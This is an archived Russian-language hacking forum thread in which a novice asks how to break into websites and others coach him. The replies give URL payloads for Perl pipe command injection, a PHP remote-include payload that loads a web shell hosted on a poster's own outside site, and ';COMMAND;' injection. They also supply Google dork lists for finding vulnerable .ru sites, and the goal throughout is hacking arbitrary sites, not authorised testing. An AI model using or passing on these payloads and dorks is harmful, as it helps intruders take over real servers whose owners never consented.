PDA

Просмотр полной версии : CGI::open()


Xalegi
12.12.2004, 01:34
Братва... я знаю, что я оооочень тупой и мне до вас далеко... но я хочу понять фсё эт... дык.. у мну трабл вот такой...

см тему...

куда надо (или вместо чего) нужно написать |id| или другие команды в, примерно, такой строчке:

.... cgi?id=103 ....
или
.... php?t=filename ....

и где большая вероятность бага?

я пробывал ооочень много... и туда впихиавл.. и туда.. везде.. и не только одну команду.. каждый вечер у меня уходит часа по 3 на поиск бажного сайта... ну ничего не получается.. не нахожу...

Кстати... о поиске.... чтоб найти в гугле определённое значене в УРЛе, нада зделать так:

filetype: cgi pl html site: .ru
(попрвате плииизз, еси я не прав... он должен мне выдать сайты, где встречается ИЛИ cgi ИЛИ перловские файты\скрипты и хтмл и обязательно тока с доменом 3-ого уровня .ru )

какие ещё есть конады для поиска в ггууггллее ?

Fr1k
12.12.2004, 13:39
Что ты поиском найти хочишь? пиши конкретней!

Xalegi
12.12.2004, 15:13
ну к примеру сайт, где в адресной строке браузера присутствует "cgi?p=filename" b ljgecnbv? xnj, ,sk cfqn c www.*****.****.RU !!!

Algol
12.12.2004, 15:21
.... cgi?id=103 ....
или
.... php?t=filename ....

и где большая вероятность бага?
Это совершенно разные типы уязвимостей.
id=103 - здесь скорее всего может встретится SQL-инъекция
а здесь php?t=filename - PHP инъекция.

Xalegi
12.12.2004, 15:35
Algol оо.. спасибки...

вот допустим у меня попались такие две вещи... (на разных сайтах ессенно)

cgi?id=103
чтоб проверить выполняемость команд (толком в ДЕЙСТВИИ видел тока |id| поэтому юзаю в начале тока её)
мне надо зделать:
cgi?id=|id|
или
cgi?|id|=103 ?


а вот в php?t=filename чтоб просмотреть права
нада именно значение переменной измненить на ";id;" так???

Че Гевара
12.12.2004, 19:04
В перловых скриптах есть некоторые фичи ... Например, пайп(Символ | ), который открывает аргумент функции не для чтения, а для испонения, что дает возможность использовать этот скрипт, как web-шелл ...

чтоб проверить выполняемость команд (толком в ДЕЙСТВИИ видел тока |id| поэтому юзаю в начале тока её)
мне надо зделать:
cgi?id=|id|
или
cgi?|id|=103 ?
Если в этой переменной id не проверяются входные параметры, то по идее синтаксис команд должен быть таков:

cgi?id=|ТУТ_ИДЕТ_КОМАНДА



Как сказал алгол, в этом случае возможна php-инъекция:

php?t=filename

Использовать это можно использовать так:

php?t=http://xssteam.narod.ru/conf.php&cmd=КОМАНДА

Но прокатит это только в том случае, если возможен удаленный инклуд ...

Xalegi
12.12.2004, 19:38
ооо.. Чегевар =)) спасибо большое!!!!!!!!!!!!!!!!!!!

кстати...

http://xssteam.narod.ru/conf.php

-это реальный сайт? т.е. он работающий?

Че Гевара
12.12.2004, 19:50
Ну это мой сайт, куда я залил несколько web-шеллов как раз для таких целей ))

Xalegi
12.12.2004, 19:57
Чегевар... дык.. эта.. есть кучу вопросик... те можно в аську? или лучше тут? ну вопросы конкретные есть... или лучше тут?

Че Гевара
12.12.2004, 20:17
Лучше тут ...

Xalegi
12.12.2004, 20:30
ОК!

как ты ищешь сайт с багом? (не корректный вопрос похоже...)

лана... как юзать гугл, чтоб найти ТО что мне нужно? ну там "filetype: xxxx" или что ещё есть такое?

Xalegi
12.12.2004, 20:35
если какие-нить скриншоты при ВЫПОЛНЕННЫХ различных командах таких как, id, ls, cd, cp и т.д. ???

просто я хочу научится с маленького взлома.. а дальше по нарастающей... чтоб мелочей не упустить!

virgoz
12.12.2004, 21:42
Короч, чтобы найти быжные сайты с пхп-инклудом, нужна искать по так:
inurl:"*./*.php?page=*.php" site:.ru
php в конце можно заменить на htm, html, inc, dat. Для более точного поиска, можно фоспользоваться такими строками: " inurl:"*./*.php?footen=*.php" site:.ru
inurl:"*./*.php?page=*.php" site:.ru
inurl:"*./*.php?header=*.php" site:.ru
inurl:"*./*.php?include=*.php" site:.ru
inurl:"*./*.php?inc=*.php" site:.ru

Для поиска скуль-инж. тоже самое, только меняем переменную page на id и т.д...
PS а че хочешь домены 3-его уровня, боишься? ;)

Chatof
27.12.2004, 15:34
Блин, а я балван искал эти долбанные пайпы в Php-скриптах. А есть какие-нить фичи в Php скриптах, чтоб ёб-шелл выполнялся?

F1reF0x
28.12.2004, 02:15
В пхп есть такая фича как ;КОМАНДА; исчо часто встречается инклуд типа index.php?page=(тут вбивай путь до шелла)

Fr1k
28.12.2004, 16:55
2 F1reF0x такое мало где возможно! (уже)

Chatof
29.12.2004, 13:59
Ну про инклуд-это я знаю. А вот поподробнее про " ;КОМАНДА; " мона?

F1reF0x
31.12.2004, 17:15
ну подставляй вместо какой нибудь переменной хотя как сказал Fr1k такое щас мало где найдёшь . Щас чаще бажные скрипты cgi

Xalegi
28.06.2005, 22:13
настольгия =) хнык-хнык =)) каким же я был БОТом =)) аж самому стыдно ща =)

m0nzt3r
28.06.2005, 23:04
=)) я тож щас прочитал стало интересно))не поверил что это ты думал что это новая тема))

nikromanger
21.11.2005, 17:55
Люди помогите мне!!!научите снимать бан в чатах.Если вы подумали про прогу АНТИБАН то я им пользовался и раньше получалось,но потом он стал отказывать я стал выяснять чём дело и мне сказала что был создан новый тип бана короче супер мега бан и его нельзя взломать если кто знает как скажи буду благодарен.Спасибо